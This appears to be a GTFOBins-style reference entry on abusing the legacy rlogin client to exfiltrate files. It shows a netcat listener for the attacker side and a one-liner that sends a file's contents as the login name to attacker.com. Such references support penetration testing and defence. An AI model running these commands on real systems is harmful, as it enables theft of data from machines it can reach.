rlogin is a symlink to
ssh, the following works only when the real
rlogin is used (e.g., from the
rsh-client APT package).
It can exfiltrate files on the network.
Send contents of a file to a TCP port. Run
nc -l -p 12345 > "file_to_save" on the attacker system to capture the contents.
rlogin hangs waiting for the remote peer to close the socket.
The file is corrupted by leading and trailing spurious data.
RHOST=attacker.com RPORT=12345 LFILE=file_to_send rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST